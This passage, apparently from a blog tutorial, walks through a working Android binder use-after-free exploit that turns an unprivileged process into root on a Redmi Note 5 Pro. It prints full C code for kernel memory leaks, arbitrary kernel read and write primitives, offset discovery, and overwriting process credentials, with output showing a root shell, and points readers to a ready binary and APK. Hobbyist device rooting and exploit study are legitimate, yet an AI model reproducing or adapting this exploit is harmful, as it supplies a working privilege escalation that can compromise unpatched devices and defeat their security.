  • Child: read(pipefd[0], buffer, 0x1000) which reads the buffer, i.e. the first 0x1000 bytes: dummy_page_4g_aligned to dummy_page_4g_aligned + 0x1000
  • The kernel loads the next 0x1000 bytes into the buffer starting at kiovecs[11].iov_base = thread + 0xa8 and thus makes the writev call terminate
  • Parent continues after the writev return
  • Parent: read(pipefd[0], buffer, 0x1000) -> read the buffer, i.e. the next 0x1000 bytes: from thread + 0xa8 to thread + 0xa8 + 0x1000
Let's try to make that into a short, simple code:
exploit.c
// a bunch of #include's #define BINDER_THREAD_EXIT 0x40046208 void hexdump_memory(unsigned char *buf, size_t byte_count){/* ... */} int main(){ struct epoll_event event = { // .events = EPOLLRDHUP | EPOLLHUP | EPOLLERR | EPOLLIN, .events = EPOLLIN, .data = NULL }; // void* dummy = mmap((void*)0x1000000, 0x1000, PROT_WRITE|PROT_EXEC, // 4GiB aligned memory // MAP_SHARED|MAP_ANONYMOUS, -1, 0); // 0x1000 bytes is enough void *dummy = mmap((void*)0x100000000UL, 0x2000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); int binder_fd = open("/dev/binder", O_RDONLY); int epfd = epoll_create(0x1000); // useless parameter, see `man epoll_create` epoll_ctl(epfd, EPOLL_CTL_ADD, binder_fd, &event); // let's write to dummy to recognize it memcpy(dummy+11, "hello whyred!\x01\x02\x03", 16); // creation of the pipe int pipefd[2]; pipe(pipefd); // creation of the buffer char buffer[0x1000]; // set the pipe buffer size to 0x1000 fcntl(pipefd[0], F_SETPIPE_SZ, 0x1000); // allocation of the `iovec`s struct iovec iovecs[25]; memset(iovecs, 0, sizeof(iovecs)); // create a pattern `iobXX` in the `iov_base`s to recognize where we are in the `iovec` array for(int i=0;i<25;i++){ iovecs[i].iov_base = (void *)(0x3030626f69 + (((uint64_t)i/10)<<24) + (((uint64_t)i%10)<<32)); iovecs[i].iov_len = 0; } // set the exploit values iovecs[10].iov_base = dummy; /* spinlock in the low address half must be zero */ iovecs[10].iov_len = 0x1000; /* wq->task_list->next */ iovecs[11].iov_base = (void *)0xDEADBEEF; /* wq->task_list->prev */ iovecs[11].iov_len = 0x1000; // creation of the child process pid_t fork_ret = fork(); if (fork_ret == 0){ // this is the child process prctl(PR_SET_PDEATHSIG, SIGKILL); // wait a bit to be sure the parent is blocked in the `writev` call printf("Child spawned: waiting 1 second\n"); sleep(1); // trigger the UAF and overwrite `iovecs[11].iov_base` with `thread + 0xa8` printf("Child triggering UAF\n"); epoll_ctl(epfd, EPOLL_CTL_DEL, binder_fd, &event); // first read: should receive 0x1000 bytes of dummy printf("Child reading buffer from pipe\n"); int received = read(pipefd[0], buffer, 0x1000); printf("The child process read 0x%x bytes, printing the first 0x100:\n", received); hexdump_memory(buffer, 0x100); // kill the child process exit(0); } // the parent process continues here // load the `iovec`s into the kernel, verify the addresses and write until the buffer is full ioctl(binder_fd, BINDER_THREAD_EXIT, NULL); printf("Parent about to be blocked\n"); int written = writev(pipefd[1], iovecs, 25); // sleep a bit not to mix the stdout outputs sleep(1); printf("The parent process just finished writing 0x%x bytes.\n", written); // read 0x1000 bytes of buffer, should receive starting at address `iovecs + 0xa8` printf("Parent reading buffer from pipe\n"); int received = read(pipefd[0], buffer, 0x1000); printf("The parent process read 0x%x bytes, printing the first 0x100:\n", received); hexdump_memory(buffer, 0x100); return 0; }
And here is the output:
whyred:/ $ /data/local/tmp/exploit
Parent about to be blocked
Child spawned: waiting 1 second
Child triggering UAF
Child reading buffer from pipe
The child process read 0x1000 bytes, printing the first 0x100:
00000000  00 00 00 00 00 00 00 00  00 00 00 68 65 6c 6c 6f  |........ ...hello|
00000010  20 77 68 79 72 65 64 21  01 02 03 00 00 00 00 00  | whyred! ........|
00000020  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |........ ........|
00000030  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |........ ........|
00000040  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |........ ........|
00000050  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |........ ........|
00000060  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |........ ........|
00000070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |........ ........|
00000080  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |........ ........|
00000090  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |........ ........|
000000a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |........ ........|
000000b0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |........ ........|
000000c0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |........ ........|
000000d0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |........ ........|
000000e0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |........ ........|
000000f0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |........ ........|
The parent process just finished writing 0x2000 bytes.
Parent reading buffer from pipe
The parent process read 0x1000 bytes, printing the first 0x100:
00000000  a8 ca ed 64 ee ff ff ff  a8 ca ed 64 ee ff ff ff  |...d.... ...d....|
00000010  00 10 00 00 00 00 00 00  69 6f 62 31 32 00 00 00  |........ iob12...|
00000020  00 00 00 00 00 00 00 00  69 6f 62 31 33 00 00 00  |........ iob13...|
00000030  00 00 00 00 00 00 00 00  69 6f 62 31 34 00 00 00  |........ iob14...|
00000040  00 00 00 00 00 00 00 00  69 6f 62 31 35 00 00 00  |........ iob15...|
00000050  00 00 00 00 00 00 00 00  69 6f 62 31 36 00 00 00  |........ iob16...|
00000060  00 00 00 00 00 00 00 00  69 6f 62 31 37 00 00 00  |........ iob17...|
00000070  00 00 00 00 00 00 00 00  69 6f 62 31 38 00 00 00  |........ iob18...|
00000080  00 00 00 00 00 00 00 00  69 6f 62 31 39 00 00 00  |........ iob19...|
00000090  00 00 00 00 00 00 00 00  69 6f 62 32 30 00 00 00  |........ iob20...|
000000a0  00 00 00 00 00 00 00 00  69 6f 62 32 31 00 00 00  |........ iob21...|
000000b0  00 00 00 00 00 00 00 00  69 6f 62 32 32 00 00 00  |........ iob22...|
000000c0  00 00 00 00 00 00 00 00  69 6f 62 32 33 00 00 00  |........ iob23...|
000000d0  00 00 00 00 00 00 00 00  69 6f 62 32 34 00 00 00  |........ iob24...|
000000e0  00 00 00 00 00 00 00 00  80 28 14 87 ee ff ff ff  |........ .(......|
000000f0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |........ ........|
whyred:/ $ 
Many good news here:
  • the timings look correct
  • the first RAM dump is dummy, you can recognize the message I put there
  • in the second RAM dump you can recognize the messages I put in the iov_bases: we are receiving kiovec data!
    We even know where we are as the UAF writes thread + 0xa8 at addresses thread + 0xa8 which are the first received bytes
    -> thread + 0xa8 = 0xffffffee64edcaa8
    -> thread = 0xffffffee64edca00
In short, we just read kernel data as an unprivileged user.
This is promising.

Leak something useful (task_struct)

Thanks to the content of binder_thread, leaking a useful value is straightforward.
The last thing it contains is struct task_struct *task.
This task_struct is actually something that contains many info about the current thread (the program, not the binder_thread).
That will be used later.
binder_thread starts leaking at thread + 0xa8 so everything after this address will be available for us and the task_struct has an offset of 0x190 (cf. the binder_thread definition) so *(uint64_t*)(buffer - 0xa8 + 0x190) = *(uint64_t*)(buffer + 0xe8) = &thread->task.

Perform an arbitrary kernel write

Kernel has leaked a kernel value into user space, but it's not practical: we can read from only one address and we can't even write.
We will start with arbitrary write.
Fortunately the exploit is close to the previous one and uses the same tricks.
When leaking data, we are reading data from the kernel. On the other hand, writing to kernel space would require us to send the kernel both the address we want to write to and the source data.
The problem to solve is: how to send data to the kernel.
I hope you guessed it, using vectored I/O.
To send the data to the kernel, we need to write to kernel memory so we will use the iovec buffers as the receiving side of the pipe this time.
The data sent through the pipe will be successively sent in each buffer according to their according iov_len.
Once again, as we want to write to kernel memory, we will have to:
  • make the kernel validate the iov_bases
  • then block the readv because of an empty buffer: if there's nothing to read from the pipe, then the process is blocked because there's nothing to write to the memory through the vectored I/O
  • create a child to trigger the UAF, that puts a kernel pointer in one of the iov_bases
  • the data sent through the pipe overwrite the kernel memory
The UAF only allows to overwrite with the value thread + 0xa8 (at thread + 0xa8 = &kiovecs[10].iov_len and thread + 0xb0 = &kiovecs[11].iov_base) so this is what we have to use in step 1.
Like in the previous chapter the blocking iovec will be iovecs[10].
Here are the 3 steps of this exploit:
  • iovecs[10] is blocked by the empty pipe and setting iovecs[10].iov_len = 1 is enough to block the process until the first byte is received (1)
  • in child process, trigger the UAF, thus writing thread + 0xa8 in kiovecs[11].iov_base (2)
  • we make kiovec[11] write 5*8 piped bytes (3*8 unused bytes + kiovecs[12]) to overwrite the memory data from thread + 0xa8 (the only address overwritten by the UAF) to thread + 0xc8 = &kiovecs[12].iov_len, which allows us to completely control kiovecs[12] (3)
  • finally our completely controlled kiovecs[12] writes the remaining bytes sent through the pipe at the address we chose
thread
kiovecs
+0x00+0x04+0x08+0x0c
+0x000
struct binder_proc *proc
kiovecs[0].iov_base
struct rb_node (uint64_t #0)
kiovecs[0].iov_len
···
+0x0a0
thread->wait.lock
kiovecs[10].iov_base
= dummy
thread->wait.task_list.next
kiovecs[10].iov_len
+0x0b0
thread->wait.task_list.prev
kiovecs[11].iov_base
kiovecs[11].iov_len
= 5 * 8
+0x0c0
kiovecs[12].iov_base
kiovecs[12].iov_len
···
···
kiovecs[24].iov_len
+0x190struct task_struct *task
(1) Initial kiovecs
thread
kiovecs
+0x00+0x04+0x08+0x0c
+0x000
struct binder_proc *proc
kiovecs[0].iov_base
struct rb_node (uint64_t #0)
kiovecs[0].iov_len
···
+0x0a0
thread->wait.lock
kiovecs[10].iov_base
= dummy
thread->wait.task_list.next
kiovecs[10].iov_len
thread + 0xa8
+0x0b0
thread->wait.task_list.prev
kiovecs[11].iov_base
thread + 0xa8
kiovecs[11].iov_len
= 5 * 8
+0x0c0
kiovecs[12].iov_base
kiovecs[12].iov_len
···
···
kiovecs[24].iov_len
+0x190struct task_struct *task
(2) Memory after the UAF
thread
kiovecs
+0x00+0x04+0x08+0x0c
+0x000
struct binder_proc *proc
kiovecs[0].iov_base
struct rb_node (uint64_t #0)
kiovecs[0].iov_len
···
+0x0a0
thread->wait.lock
kiovecs[10].iov_base
thread->wait.task_list.next
kiovecs[10].iov_len
thread + 0xa8
whatever
+0x0b0
thread->wait.task_list.prev
kiovecs[11].iov_base
thread + 0xa8
whatever
kiovecs[11].iov_len
whatever
+0x0c0
kiovecs[12].iov_base
target_addr
kiovecs[12].iov_len
target_size
···
···
kiovecs[24].iov_len
+0x190struct task_struct *task
(3) Memory after the kiovecs[11]-based kernel write has been performed
The next bytes being pushed through the pipe will now make the kernel
use kiovecs[12] and will write the received bytes to this address
And this is how the arbitrary write is done.
Sadly, we can't see the result because we can only write, not read, kernel data.
I can confirm it works though, and you will too, in the next chapter.
To keep things practical, let's put this in a function: void kwrite_u64(uint64_t addr, uint64_t value).
exploit.c
int kwrite_u64(uint64_t target_addr, uint64_t target_value){ struct epoll_event event = { .events = EPOLLIN, .data = NULL }; epoll_ctl(epfd, EPOLL_CTL_ADD, binder_fd, &event); // creation of the pipe int pipefd[2]; // pipe(pipefd); if (socketpair(AF_UNIX, SOCK_STREAM, 0, pipefd)) errx(1, "socketpair"); write(pipefd[1], "X", 1); // creation of the buffer char buffer[0x1000]; // allocation of the `iovec`s struct iovec iovecs[25]; memset(iovecs, 0, sizeof(iovecs)); // actual write parameters uint64_t write_data_chunk[] = {1, 0xDEADBEEF, 5*8, target_addr, 8}; // set the exploit values iovecs[10].iov_base = dummy; iovecs[10].iov_len = 1; // will be replaced by the UAF iovecs[11].iov_base = (void *)0xDEADBEEF; // will be replaced by the UAF iovecs[11].iov_len = 5*8; iovecs[12].iov_base = (void *)0xDEADBEEF; // will be replaced by the `kiovecs[11]`-based rewrite iovecs[12].iov_len = 8; // will be replaced by the `kiovecs[11]`-based rewrite // creation of the child process pid_t fork_ret = fork(); if (fork_ret == 0){ // this is the child process // printf("Child spawned: waiting 1 second\n"); prctl(PR_SET_PDEATHSIG, SIGKILL); // wait a bit to be sure the parent is blocked in the `writev` call SLEEP(); // trigger the UAF and overwrite iovecs[11].iov_base with `thread + 0xa8` // printf("Child triggering UAF\n"); epoll_ctl(epfd, EPOLL_CTL_DEL, binder_fd, &event); // first read: should receive 0x1000 bytes of dummy // printf("Child reading buffer from pipe\n"); write(pipefd[1], write_data_chunk, 5*8); write(pipefd[1], &target_value, 8); // kill the child process exit(0); } // the parent process continues here ioctl(binder_fd, BINDER_THREAD_EXIT, NULL); // printf("Parent about to be blocked\n"); struct msghdr msg = { .msg_iov = iovecs, .msg_iovlen = 25 }; // load the `iovec`s into the kernel, verify the addresses and read bytes until it has received all the bytes of `msg` int recvmsg_result = recvmsg(pipefd[0], &msg, MSG_WAITALL); // sleep a bit not to mix the stdout outputs SLEEP(); // printf("The parent process received 0x%x bytes\n", recvmsg_result); int status; if (wait(&status) != fork_ret) errx(1, "wait"); return 0; }

Perform an arbitrary kernel read without overwriting addr_limit

When you have arbitrary kernel write, you usually overwrite the addr_limit of your current process (if you manage to find its address) in order to achieve instant arbitrary kernel read over the whole RAM.
This doesn't work on the Redmi Note 5 Pro though, so I won't discuss it more.
This is, as far as I know, the first time this specific arbitrary kernel read method is explained, you won't find explanations elsewhere.
So if my method is badly executed or if you know another place where this is discussed or even if you have suggestions for improvement, then please contact me (comment section below, Github, mail or whatever) so that I can fix and/or compare the methods.
As seen above, writev, readv and recvmsg are one-way only. The writev sends to the file descriptor what it reads from the buffers memory while the other two reads data from the file descriptor and write to the buffers memory. The read operation we are trying to make will be more complicated because it needs to do both: it must send the target address to the kernel and then receive the corresponding data from the kernel.
The problem is that in order to write in kernel memory, you need to know the address you want to write to, so you need to have received it from the kernel itself as it's a kernel address.
In short, in order to write you need to read (to know where you, the exploiter, want to write) and in order to read you need to write (for the kernel to know where it must read from), it's a vicious circle.
Except for one thing though: there is one kernel address that we can spontaneously receive: thread + 0xa8, i.e. kiovecs[11].iov_base.
Thanks to this leaked pointer we can sort everything out.
Notice we want to read data from kernel memory so we will use writev to make the kernel write from the kiovec buffers into the pipe and read to read from the pipe.
Let's write the whole process down:
  • first of all we leak thread + 0xa8 as before, but we also know that at some point the kernel will extract the data we want:
    • iovecs[10].iov_base is dummy
    • iovecs[10].iov_len is 0x1000
    • iovecs[11].iov_base is 0xdeadbeef
    • iovecs[11].iov_len is 0x1000
    • iovecs[n].iov_base is 0xbeefdead, as the address that will be overwritten by target_addr for extraction (n unknown for now)
    • iovecs[n].iov_len is 0x1000, as an example
  • Parent: creates child process that will sleep for 2 seconds, triggers the UAF and reads 0x1000 bytes into buffer
  • Child: created, waits 2 seconds...
  • Parent: writev to load the iovecs into kiovecs, process is blocked (1)
  • Child: ...triggers the UAF, loads 0x1000 bytes (kiovecs[10].iov_base = dummy) into buffer (2)
  • Kernel: 0x1000 bytes were read from the pipe so kernel loads 0x1000 new bytes (i.e. kiovecs[11]) into the pipe
  • Child: loads again 0x1000 bytes (kiovecs[11] = thread + 0xa8) into buffer
  • Kernel: 0x1000 bytes were read from the pipe so loads 0x1000 new bytes (i.e. kiovecs[12] if we set kiovecs[12].iov_len = 0x1000) into the pipe
  • Child: we know that *(thread + 0xa8) = thread + 0xa8, so if we deference the first 8 bytes of buffer we get thread + 0xa8 in user space: leak = *(void**)buffer = thread + 0xa8
  • Child: we overwrite iovecs[n].iov_base with target_addr using kwrite64(&kiovecs[n].iov_base, target_addr) in a grandchild process but as we don't know kiovecs, we use leak as base address: kwrite64(leak + 8 + 16*(n-11), target_addr) (write it down if necessary) (3)
  • Child: loads again 0x1000 bytes (kiovecs[12]) into buffer
  • Kernel: 0x1000 bytes were read from the pipe so loads 0x1000 new bytes (i.e. kiovecs[13]) into the pipe
  • Comment: with n = 13 we have our data waiting for us in the pipe so let's assume this value
  • Kernel: nothing more to load, writev call is finished
  • Child: terminates
  • Parent: loads 0x1000 bytes (kiovecs[13]) into buffer
  • Parent: the content of buffer is the 0x1000 first bytes at kiovecs[13].iov_base = target_addr
  • Arbitrary read achieved
thread
kiovecs
+0x00+0x04+0x08+0x0c
+0x000
struct binder_proc *proc
kiovecs[0].iov_base
struct rb_node (uint64_t #0)
kiovecs[0].iov_len
···
+0x0a0
thread->wait.lock
kiovecs[10].iov_base
= dummy
thread->wait.task_list.next
kiovecs[10].iov_len
= 0x1000
+0x0b0
thread->wait.task_list.prev
kiovecs[11].iov_base
= 0xdeadbeef
kiovecs[11].iov_len
= 0x1000
+0x0c0
kiovecs[12].iov_base
= dummy
kiovecs[12].iov_len
= 0x1000
+0x0d0
kiovecs[13].iov_base
= 0xbeefdead
kiovecs[13].iov_len
= 0x1000
···
···
kiovecs[24].iov_len
+0x190struct task_struct *task
(1) Initial kiovecs
thread
kiovecs
+0x00+0x04+0x08+0x0c
+0x000
struct binder_proc *proc
kiovecs[0].iov_base
struct rb_node (uint64_t #0)
kiovecs[0].iov_len
···
+0x0a0
thread->wait.lock
kiovecs[10].iov_base
thread->wait.task_list.next
kiovecs[10].iov_len
thread + 0xa8
+0x0b0
thread->wait.task_list.prev
kiovecs[11].iov_base
thread + 0xa8
kiovecs[11].iov_len
+0x0c0
kiovecs[12].iov_base
kiovecs[12].iov_len
+0x0d0
kiovecs[13].iov_base
kiovecs[13].iov_len
···
···
kiovecs[24].iov_len
+0x190struct task_struct *task
(2) After the UAF
thread
kiovecs
+0x00+0x04+0x08+0x0c
+0x000
struct binder_proc *proc
kiovecs[0].iov_base
struct rb_node (uint64_t #0)
kiovecs[0].iov_len
···
+0x0a0
thread->wait.lock
kiovecs[10].iov_base
thread->wait.task_list.next
kiovecs[10].iov_len
thread + 0xa8
+0x0b0
thread->wait.task_list.prev
kiovecs[11].iov_base
thread + 0xa8
kiovecs[11].iov_len
+0x0c0
kiovecs[12].iov_base
kiovecs[12].iov_len
+0x0d0
kiovecs[13].iov_base
= target_addr
kiovecs[13].iov_len
···
···
kiovecs[24].iov_len
+0x190struct task_struct *task
(3) After the kwrite_u64 call
exploit.c
uint64_t kread_u64(uint64_t addr){ uint64_t r; kread(addr, &r, 8); return r; } int kread(uint64_t addr, void *buf, int size){ struct epoll_event event = { .events = EPOLLIN, .data = NULL }; epoll_ctl(epfd, EPOLL_CTL_ADD, binder_fd, &event); // creation of the pipe int pipefd[2]; pipe(pipefd); // creation of the buffer char buffer[0x1000]; // set the pipe buffer to 0x1000 fcntl(pipefd[0], F_SETPIPE_SZ, 0x1000); // allocation of the `iovec`s struct iovec iovecs[25]; memset(iovecs, 0, sizeof(iovecs)); // set the exploit values iovecs[10].iov_base = dummy; /* spinlock in the low address half must be zero */ iovecs[10].iov_len = 0x1000; /* wq->task_list->next */ iovecs[11].iov_base = (void *)0xDEADBEEF; /* wq->task_list->prev */ iovecs[11].iov_len = 0x1000; iovecs[12].iov_base = dummy; iovecs[12].iov_len = 0x1000; iovecs[13].iov_base = (void *)0xDEADBEEF; iovecs[13].iov_len = 0x1000; // creation of the child process pid_t fork_ret = fork(); if (fork_ret == 0){ // this is the child process // printf("Child spawned: waiting 1 second\n"); prctl(PR_SET_PDEATHSIG, SIGKILL); // wait a bit to be sure the parent is blocked in the `writev` call SLEEP(); // trigger the UAF and overwrite iovecs[11].iov_base with `thread + 0xa8` // printf("Child triggering UAF\n"); epoll_ctl(epfd, EPOLL_CTL_DEL, binder_fd, &event); // printf("Child reading buffer from pipe\n"); read(pipefd[0], buffer, 0x1000); read(pipefd[0], buffer, 0x1000); unsigned long thread = (*(unsigned long *)buffer) - 0xa8; pid_t grandchild = fork(); if (grandchild == -1) errx(1, "fork"); if (grandchild == 0){ prctl(PR_SET_PDEATHSIG, SIGKILL); kwrite_u64(thread + 0xd0, addr); exit(0); } int status; if (wait(&status) != grandchild) errx(1, "wait"); read(pipefd[0], buffer, 0x1000); close(pipefd[1]); // kill the child process exit(0); } int received; // the parent process continues here // load the `iovec`s into the kernel, verify the addresses and write until the buffer is full ioctl(binder_fd, BINDER_THREAD_EXIT, NULL); // printf("Parent about to be blocked\n"); int written = writev(pipefd[1], iovecs, 25); // sleep a bit not to mix the stdout outputs SLEEP(); // printf("The parent process just finished writing 0x%x bytes.\n", written); // read the buffer // printf("Parent reading buffer from pipe\n"); received = read(pipefd[0], buffer, 0x1000); memcpy(buf, buffer, size); // printf("The parent process read 0x%x bytes, printing the first 0x100:\n", received); // hexdump_memory(buffer, size*8); int status; if (wait(&status) != fork_ret) errx(1, "wait"); return 0; } int main(int argc, char** argv){ binder_fd = open("/dev/binder", O_RDONLY); epfd = epoll_create(1000); dummy = mmap((void*)0x100000000UL, 0x2000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); // `leak` is `thread + 0xa8` uint64_t leak = get_leak(); printf("leak = %016lx\n", leak); printf("*leak = %016lx\n", kread_u64(leak)); // if this prints the same value as above // then arbitrary kernel read works kwrite_u64(leak, 0xdead5ec); printf("*leak = %016lx\n", kread_u64(leak)); // if this prints 0xdead5ec // then arbitrary kernel write works return 0; }
whyred:/ $ /data/local/tmp/exploit
leak  = ffffffe031e43ca8
*leak = ffffffe031e43ca8
*leak = 000000000dead5ec
Game over.

Become root and disable the security

With arbitrary read and write kernel access we can basically do whatever we want.
To become root the first thing to do is becoming root, i.e. rewriting your IDs.
In order to do this you need to know where to write.
For this we use intermediate structures until finding the kernel base.
From there we use calculated offsets to reach our final targets.

Check kernel base

The offsets we use could be off depending on the kernel used, for example maybe different regional version of the same ROM version can have different offsets.
They represent the offset the compiler needs to go to in a structure to find the appropriate content.
For example, the offset of wait in thread is 0xa0 for my kernel. In the whole article I supposed so but in other kernels it may be different.
If it is only for accessing data then just changing a constant works but if it impacts the exploit core (e.g. if offset(struct binder_thread, wait) = 0xb8) then the exploit itself must be changed (it's a good exercise by the way).
Anyway, finding offsets is non-trivial but it's no magic, everybody with enough motivation can do it.
The method is the same for each offset:
  • get your kernel source code or a reasonably close one if you don't have access to it
  • get Ghidra
  • get your compiled kernel and a prepared ELF from it for Ghidra
  • in the source code, find a function call using the variable for which you want the offset
  • in Ghidra, open the compiled kernel and look for the function that does this call
  • with the help of Ghidra and look for the call
  • that's the tricky part: now you have to make an educated guess based on the information in front of you
For the kernel base check we need three offsets here:
  • mm in a task_struct
  • user_ns in a mm_struct
  • init_user_ns (init_user namespace) kernel symbol

Prepare the kernel ELF

For this we'll need Ghidra (or any disassembler you prefer) to read our kernel.
First get your current boot.img using EDL mode, an official update or anything else.
Then run these commands to extract the kernel, fix it and export the symbols.
bash
# download imjtool from http://newandroidbook.com/tools/imjtool.html $ imjtool.ELF64 boot.img extract $ git clone https://github.com/nforest/droidimg.git $ gcc droidimg/fix_kaslr_arm64.c $ ./a.out extracted/kernelimage extracted/kernelimage_fix_kaslr $ ./droidimg/vmlinux.py extracted/kernelimage_fix_kaslr > symbols.txt $ sudo pip3 install --upgrade lz4 git+https://github.com/marin-m/vmlinux-to-elf $ vmlinux-to-elf extracted/kernelimage_fix_kaslr kernel.elf [+] Successfully wrote the new ELF kernel to kernel.elf
Now you can load kernel.elf in Ghidra.

Find offset of the member of a struct

First we need the offset of mm in task_struct:
I don't have my kernel (Xiaomi's 4.4.78-perf+) source code so I took the one of 4.4.79. In the previous part I downloaded my boot.img with EDL mode but any source would work as long as it is your exact kernel.
  • Open kernel.elf in ghidra
  • Run ag "task\->mm" in the console: there are a few dozens promising calls
  • I chose the add_mm_counter_fast function in mm/memory.c because it's really short so it will be easy to find the correct value
linux/mm/memory.c
static void add_mm_counter_fast(struct mm_struct *mm, int member, int val) { struct task_struct *task = current; // likely is only a macro used for branch prediction if (likely(task->mm == mm)) // <- this is a `x == param_1` task->rss_stat.count[member] += val; // <- this is a `+=` else add_mm_counter(mm, member, val); }
  • Go in Ghidra, search add_mm_counter_fast in the Functions window, and open it in the decompiler window
ghidra_decompiled__linux_mm_memory.c
// ... lVar2 = cRead_8(sp_el0); if (*(longlong *)(*(longlong *)(lVar2 + 0x10) + 0x4d8) == param_1) { // <- this is a `x == param_1` lVar2 = *(longlong *)(lVar2 + 0x10) + (longlong)param_2 * 4; *(int *)(lVar2 + 0x514) = *(int *)(lVar2 + 0x514) + param_3; // <- this is a `+=` } // ...

Offset of mm in task_struct

From above it looks like the offset is 0x4d8, I'll let you find other occurences of the 0x4d8 offset to confirm that.

Offset of user_ns in mm_struct

With ag "\->user_ns" then using would_dump from fs/exec.c, you easily find 0x308 is the offset of user_ns in mm_struct.

Offset of creds and real_creds in task_struct

With ag "\->real_creds" then using exit_creds from kernel/cred.c, you very easily find 0x728 and 0x730 are the offsets of real_creads and creds in task_struct.

Offset of init_user_ns in kernel

Last thing we need the symbol of init_user_ns.
I made you extract the kernel symbols above, so now you just have to ag init_user_ns symbols.txt and you get:
ffffff800a41e358 D init_user_ns
You get the head with head symbols.txt -n1:
ffffff8008080000 t _head
So finally the offset is 0xffffff800a41e358 - 0xffffff8008080000, i.e. 0x239e358.

Actually check kernel base

In the kernel base checking we check two things: the kernel base and the init (more info at https://en.wikipedia.org/wiki/Init) creds values.
exploit.c
u64 current_mm = kread_u64(task /* from exploit */ + offset_of_task_struct_mm /* 0x4d8 */); u64 current_user_ns = kread_u64(current_mm + offset_of_mm_struct_user_ns /* 0x308 */); u64 kernel_base = current_user_ns - ksym_init_user_ns /* 0x239e358 */; // first check: kernel base is page-aligned if (kernel_base & 0xFFF) err(1, "kernel base is not page-aligned"); u64 init_task = kernel_base + ksym_init_task /* 0x2394a90 */; (struct cred*) cred = kread_u64(init_task + offset_of_task_struct_cred); (struct cred*) real_cred = kread_u64(init_task + offset_of_task_struct_real_cred); // second check: `init_task` ids are 0 and all caps set for creds and real_creds if (cred.uid || cred.gid /* || ... */) err(1, "init_task not where expected"); if (cred.cap_permitted != 0x3fffffffff /* || ... */) err(1, "init_task not where expected"); /* same for real_creds */ // third check: check that the uid in `cred` is our uid if (kread_u32(cred + offset_of_cred_uid) != getuid()) err(1, "bad cred");
If this passes there are pretty good chances that the offsets are the correct ones.

Patch creds

The info about the current thread is stored in a thread_info structure in the kernel memory and this includes the thread credentials.
Patching creds is easy, we just have to write the correct values at the right spot: IDs and capabilities.
exploit.c
kwrite_u32(cred_ptr + offsetof(struct cred, uid), 0); kwrite_u32(cred_ptr + offsetof(struct cred, gid), 0); kwrite_u32(cred_ptr + offsetof(struct cred, suid), 0); kwrite_u32(cred_ptr + offsetof(struct cred, sgid), 0); kwrite_u32(cred_ptr + offsetof(struct cred, euid), 0); kwrite_u32(cred_ptr + offsetof(struct cred, egid), 0); kwrite_u32(cred_ptr + offsetof(struct cred, fsuid), 0); kwrite_u32(cred_ptr + offsetof(struct cred, fsgid), 0); kwrite_u32(cred_ptr + offsetof(struct cred, securebits), 0); kwrite_u64(cred_ptr + offsetof(struct cred, cap_inheritable), ~(u64)0); kwrite_u64(cred_ptr + offsetof(struct cred, cap_permitted), ~(u64)0); kwrite_u64(cred_ptr + offsetof(struct cred, cap_effective), ~(u64)0); kwrite_u64(cred_ptr + offsetof(struct cred, cap_bset), ~(u64)0); kwrite_u64(cred_ptr + offsetof(struct cred, cap_ambient), ~(u64)0);
After doing this, we should be root so getuid() should return 0.
exploit.c
if (getuid()) err(1, "still not root after patching");
Now we spawn a bash console from the exploit (see execl) and we see a # prompt in which we can ls /data and get a answer:
bash
whyred:/ $ ls /data ls: /data: Permission denied 1|whyred:/ $ /data/local/tmp/exploit whyred:/ # ls /data FTM_AP app-asec backup dalvik-cache evt-test local misc mqsas nvt_test resource-cache system time vendor adb app-ephemeral bootchart data fota lost+found misc_ce nativetest ota sdcard system_ce tombstones anr app-lib cache dpm hostapd media misc_de nativetest64 ota_package shared system_de user app app-private connectivity drm lct_diag mediadrm miui nfc property ss thermal user_de whyred:/ #

Becoming root isn't enough

As becoming root doesn't allow you to do everything we still a some work to do.
I'll leave it up to you to go read the code.
The three remaning things are:

Final exploit

All of the previous code is in exploit.c in my Github page, along with some other useful files.

Apply on Redmi Note 5 Pro and others

Now you have all the needed information about the exploit, you just have to do it.

Redmi Note 5 Pro (whyred)

MIUI 10.3 and below

This is the version I'm using so this one is easy, go to my Github and either:
  • download the APK, install it and run it on your phone
  • download the exploit as binary (bin/exploit), upload it to your phone with adb to /data/local/tmp and run it
  • download or clone the repo and run build.sh

MIUI 11 and above

For now this method doesn't work on these versions.
I will try to flash MIUI 10.3 in EDL mode to see whether it works. I think so but didn't tested so can't tell for sure.
If I succeed I will publish a script to flash everything as needed once in EDL mode.

Device with exploitable kernel

First of all you can't know whether your kernel is exploitable before trying because some compilation options may break the exploit.
You have to test for yourself on your own device.
There is close to no risk doing so as the exploit perform some checks before running.
You just have to find the offsets like described in the Check kernel base chapter above.
When you're done gathering all the offsets you can run the exploit with these and hopefully it will work.
If not then reach me using your prefered way and I can try to sort it out with you.

Devices with patched kernel

If your current ROM has a patched kernel then like for whyred you may have some success by flashing an old official ROM with an exploitable kernel.
Although if your phone constructor put an anti-downgrade mecanism this may not work or even hard brick your device.
If you read the article until now I think you'd have no problem finding a way to downgrade if it is possible for your device.

Resources




Comments (0)
No comments yet